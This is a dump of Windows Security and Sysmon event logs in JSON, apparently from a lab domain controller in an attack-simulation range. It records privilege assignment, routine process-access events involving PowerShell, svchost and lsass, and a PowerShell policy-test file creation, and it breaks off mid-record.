{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220572,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BF72\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7bf72","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4902,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4903,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4904,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4905,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4906,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.828\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.828","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4907,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.843\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.843","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4908,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.859\r\nProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nProcessId: 4984\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_lj3zku44.15s.ps1\r\nCreationUtcTime: 2020-08-01 05:52:36.859","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.859","ProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_lj3zku44.15s.ps1","CreationUtcTime":"2020-08-01 05:52:36.859","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4909,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.890\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.890","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-0324-5F25-0000-00100DC10700}","TargetProcessId":"4984","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4910,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.890\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nTargetProcessId: 4984\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: 